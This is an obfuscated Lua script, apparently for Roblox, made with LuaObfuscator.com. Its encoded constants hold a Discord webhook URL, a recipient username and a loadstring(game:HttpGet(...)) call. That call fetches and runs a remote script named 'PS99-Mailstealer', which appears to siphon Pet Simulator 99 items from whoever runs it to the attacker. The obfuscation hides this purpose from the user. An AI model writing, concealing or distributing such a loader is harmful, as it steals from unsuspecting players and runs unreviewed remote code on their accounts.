--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=v5(v69,v19);v19=nil;return v77;else return v69;end end end);local function v20(v31,v32,v33) if v33 then local v70=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v70-(v70%((512 + 57) -(367 + 201))) ;else local v71=927 -(214 + (1015 -302)) ;local v72;while true do if (v71==(0 + 0)) then v72=(1 + 1)^(v32-(878 -((1347 -(68 + 997)) + (1865 -(226 + 1044))))) ;return (((v31%(v72 + v72))>=v72) and (1638 -((6631 -5108) + 114))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=117 -(32 + 85) ;local v36;local v37;while true do if (v35==(2 -1)) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + 1 + (2 -1) ;v35=1 + 0 + 0 ;end end end local function v23() local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(953 -(802 + 150))) then return (v42 * (45169940 -28392724)) + (v41 * (118879 -53343)) + (v40 * (187 + (89 -20))) + v39 ;end if (v38==(997 -(915 + 82))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (11 -7) ;v38=1 + 0 ;end end end local function v24() local v43=v23();local v44=v23();local v45=1188 -(1069 + 118) ;local v46=(v20(v44,2 -(1 + 0) ,83 -63 ) * ((3 -1)^(6 + 26))) + v43 ;local v47=v20(v44,37 -16 ,31 + 0 );local v48=((v20(v44,823 -(368 + 423) )==((775 -(201 + 571)) -2)) and  -1) or (19 -(10 + 8)) ;if (v47==((0 + 0) -0)) then if (v46==0) then return v48 * (442 -(416 + 26)) ;else v47=3 -(1140 -(116 + 1022)) ;v45=0 + 0 ;end elseif (v47==(3621 -1574)) then return ((v46==(438 -(145 + 293))) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end local function v25(v49) local v50;if  not v49 then local v73=0 -0 ;while true do if (v73==(0 -0)) then v49=v23();if (v49==(859 -(814 + 45))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -((1 + 1) -1) );v18=v18 + v49 ;local v51={};for v66=1 + (885 -(261 + 624)) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=121 -(17 + 104) ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v68=0;while true do if (v68~=(1 -0)) then else if (v52~=(2 + 1)) then else local v94=0 + 0 ;while true do if (v94==(0 + 0)) then local v104=126 -(116 + 10) ;while true do if (v104~=0) then else for v117=1 + 0 ,v23() do v54[v117-1 ]=v28();end return v56;end end end end end if (v52==2) then local v95=738 -(542 + 196) ;while true do if ((0 -0)~=v95) then else for v106=1,v57 do local v107=0 -0 ;local v108;local v109;local v110;local v111;while true do if ((0 + 0)~=v107) then else v108=1636 -(1373 + 263) ;v109=nil;v107=1001 -(451 + 549) ;end if (v107==(1 + 0)) then v110=nil;v111=nil;v107=1 + 1 ;end if (v107~=2) then else while true do if ((0 -0)~=v108) then else local v139=0 -0 ;local v140;while true do if (v139~=0) then else v140=0 -0 ;while true do if (v140~=(0 -0)) then else local v179=0;while true do if (v179==(406 -(118 + 287))) then v140=1385 -(746 + 638) ;break;end if (v179~=0) then else v109=1121 -(118 + 1003) ;v110=nil;v179=1 + 0 ;end end end if ((2 -1)~=v140) then else v108=1 -0 ;break;end end break;end end end if (v108==(342 -(218 + 123))) then v111=nil;while true do if (v109~=1) then else if (v110==(1582 -(1535 + 46))) then v111=v21()~=0 ;elseif (v110==2) then v111=v24();elseif (v110~=(3 + 0)) then else v111=v25();end v58[v106]=v111;break;end if (v109==(0 + 0)) then local v161=560 -(306 + 254) ;local v162;local v163;while true do if (v161==(978 -(553 + 424))) then while true do if (v162~=0) then else v163=0 -0 ;while true do if ((0 + 0)~=v163) then else local v182=0;while true do if (v182~=(0 + 0)) then else v110=v21();v111=nil;v182=1 + 0 ;end if ((1 -0)~=v182) then else v163=1468 -(899 + 568) ;break;end end end if (v163~=(1 + 0)) then else v109=1;break;end end break;end end break;end if (v161~=(0 + 0)) then else v162=0;v163=nil;v161=2 -1 ;end end end end break;end end break;end end end v56[606 -(268 + 335) ]=v21();v95=291 -(60 + 230) ;end if ((573 -(426 + 146))==v95) then for v112=1 + 0 ,v23() do local v113=0 + 0 ;local v114;local v115;local v116;while true do if (v113==(753 -(239 + 514))) then v114=1456 -(282 + 1174) ;v115=nil;v113=1330 -(797 + 532) ;end if (v113~=(812 -(569 + 242))) then else v116=nil;while true do if (v114~=0) then else v115=0 -0 ;v116=nil;v114=1 + 0 ;end if (v114==(1025 -(706 + 318))) then while true do if ((1251 -(721 + 530))~=v115) then else v116=v21();if (v20(v116,1272 -(945 + 326) ,732 -(476 + 255) )~=(1130 -(369 + 761))) then else local v173=0;local v174;local v175;local v176;local v177;local v178;while true do if (v173~=(2 -1)) then else v176=nil;v177=nil;v173=2 + 0 ;end if (v173==2) then v178=nil;while true do if ((702 -(271 + 429))==v174) then while true do if (v175~=2) then else if (v20(v177,1 + 0 ,1501 -(1408 + 92) )~=1) then else v178[1088 -(461 + 625) ]=v58[v178[1290 -(993 + 295) ]];end if (v20(v177,1 + 1 ,2)~=1) then else v178[3]=v58[v178[1174 -(418 + 753) ]];end v175=3;end if (v175==3) then if (v20(v177,3,2 + 1 )==(1 + 0)) then v178[2 + 2 ]=v58[v178[2 + 2 ]];end v53[v112]=v178;break;end if (v175==(530 -(406 + 123))) then local v184=336 -(144 + 192) ;while true do if (v184==0) then v178={v22(),v22(),nil,nil};if (v176==(0 + 0)) then local v193=1322 -(1249 + 73) ;local v194;local v195;while true do if (v193~=1) then else while true do if (v194==(0 + 0)) then v195=1145 -(466 + 679) ;while true do if ((1580 -(1183 + 397))==v195) then v178[8 -5 ]=v22();v178[4]=v22();break;end end break;end end break;end if (v193==(0 + 0)) then v194=0 -0 ;v195=nil;v193=1976 -(1913 + 62) ;end end elseif (v176==(2 -1)) then v178[3]=v23();elseif (v176==(2 + 0)) then v178[1903 -(106 + 1794) ]=v23() -((1935 -(565 + 1368))^(60 -44)) ;elseif (v176==3) then local v198=0 + 0 ;local v199;local v200;local v201;while true do if (v198~=1) then else v201=nil;while true do if (v199==(1 -0)) then while true do if (v200~=(0 + 0)) then else v201=0 + 0 ;while true do if ((0 -0)==v201) then v178[7 -4 ]=v23() -(2^(130 -(4 + 110))) ;v178[588 -(57 + 527) ]=v22();break;end end break;end end break;end if (v199~=(0 + 0)) then else local v204=476 -(41 + 435) ;while true do if (v204==0) then v200=1001 -(938 + 63) ;v201=nil;v204=1 + 0 ;end if (v204~=(1126 -(936 + 189))) then else v199=1;break;end end end end break;end if (v198==(1427 -(41 + 1386))) then v199=0;v200=nil;v198=104 -(17 + 86) ;end end end v184=1;end if (v184==(1 + 0)) then v175=3 -1 ;break;end end end if ((0 -0)==v175) then local v185=0;local v186;while true do if (v185==(166 -(122 + 44))) then v186=0 -0 ;while true do if (v186==0) then v176=v20(v116,2,3);v177=v20(v116,4,1144 -(782 + 356) );v186=268 -(176 + 91) ;end if (v186==(3 -2)) then v175=2 -1 ;break;end end break;end end end end break;end if (v174==(0 -0)) then local v180=0 + 0 ;while true do if (v180~=(1876 -(157 + 1718))) then else v174=1;break;end if (v180~=(0 + 0)) then else v175=0 -0 ;v176=nil;v180=66 -(30 + 35) ;end end end if (v174~=(1 + 0)) then else local v181=0;while true do if (v181==(1258 -(1043 + 214))) then v174=7 -5 ;break;end if (v181~=(1018 -(697 + 321))) then else v177=nil;v178=nil;v181=2 -1 ;end end end end break;end if (v173~=(0 -0)) then else v174=1212 -(323 + 889) ;v175=nil;v173=2 -1 ;end end end break;end end break;end end break;end end end v52=2 + 1 ;break;end end end break;end if (0~=v68) then else if (v52==1) then local v96=0 -0 ;while true do if (v96~=0) then else v56={v53,v54,nil,v55};v57=v23();v96=873 -(826 + 46) ;end if (1~=v96) then else v58={};v52=949 -(245 + 702) ;break;end end end if (v52~=(0 -0)) then else local v97=0 + 0 ;while true do if (v97==(413 -(15 + 398))) then v53={};v54={};v97=983 -(18 + 964) ;end if (v97==(3 -2)) then v55={};v52=1 + 0 ;break;end end end v68=1 -0 ;end end end end local function v29(v59,v60,v61) local v62=0;local v63;local v64;local v65;while true do if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...) local v78=v63;local v79=v64;local v80=v65;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==1) then if (v91<=5) then if (v91<=2) then if (v91<=0) then local v119;local v120,v121;local v122;local v123;v61[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v61[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v61[v90[3]];v82=v82 + 1 ;v90=v78[v82];v123=v90[2];v122=v88[v90[3]];v88[v123 + 1 ]=v122;v88[v123]=v122[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v123=v90[2];v120,v121=v81(v88[v123](v13(v88,v123 + 1 ,v90[3])));v83=(v121 + v123) -1 ;v119=0;for v136=v123,v83 do v119=v119 + 1 ;v88[v136]=v120[v119];end v82=v82 + 1 ;v90=v78[v82];v123=v90[2];v88[v123]=v88[v123](v13(v88,v123 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];elseif (v91==1) then local v141=v90[2];v88[v141]=v88[v141](v13(v88,v141 + 1 ,v83));else v88[v90[2]]=v90[3];end elseif (v91<=3) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==4) then v61[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v61[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v82=v90[3];else v88[v90[2]]=v61[v90[3]];end elseif (v91<=8) then if (v91<=6) then v61[v90[3]]=v88[v90[2]];elseif (v91==7) then do return;end else local v152=0;local v153;local v154;local v155;local v156;while true do if (v152==2) then for v170=v153,v83 do v156=v156 + 1 ;v88[v170]=v154[v156];end break;end if (1==v152) then v83=(v155 + v153) -1 ;v156=0;v152=2;end if (v152==0) then v153=v90[2];v154,v155=v81(v88[v153](v13(v88,v153 + 1 ,v90[3])));v152=1;end end end elseif (v91<=9) then v82=v90[3];elseif (v91>10) then local v157=0;local v158;local v159;while true do if (v157==0) then v158=v90[2];v159=v88[v90[3]];v157=1;end if (v157==1) then v88[v158 + 1 ]=v159;v88[v158]=v159[v90[4]];break;end end else v88[v90[2]]();end v82=v82 + 1 ;break;end if (0==v93) then v90=v78[v82];v91=v90[1];v93=1;end end end end;end end end return v29(v28(),{},v17)(...);end return v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31322O3439363033322O3539343531373532362F50466F4A65534666474B625048706664524F2O4E633863555A4A436C77576F596F6A7049737149375957487842755256364E6B4E613554323859524E536C492O68594B78030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657203083O00557365726E616D65030B3O005941574978414E4452454103093O00557365726E616D653200163O0012023O00013O0026033O000D000100020004093O000D0001001202000100043O00122O000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026033O0001000100010004093O000100010012020001000A3O001204000100093O00122O0001000A3O00122O0001000B3O00124O00023O00044O000100012O00073O00017O00",v9(),...);
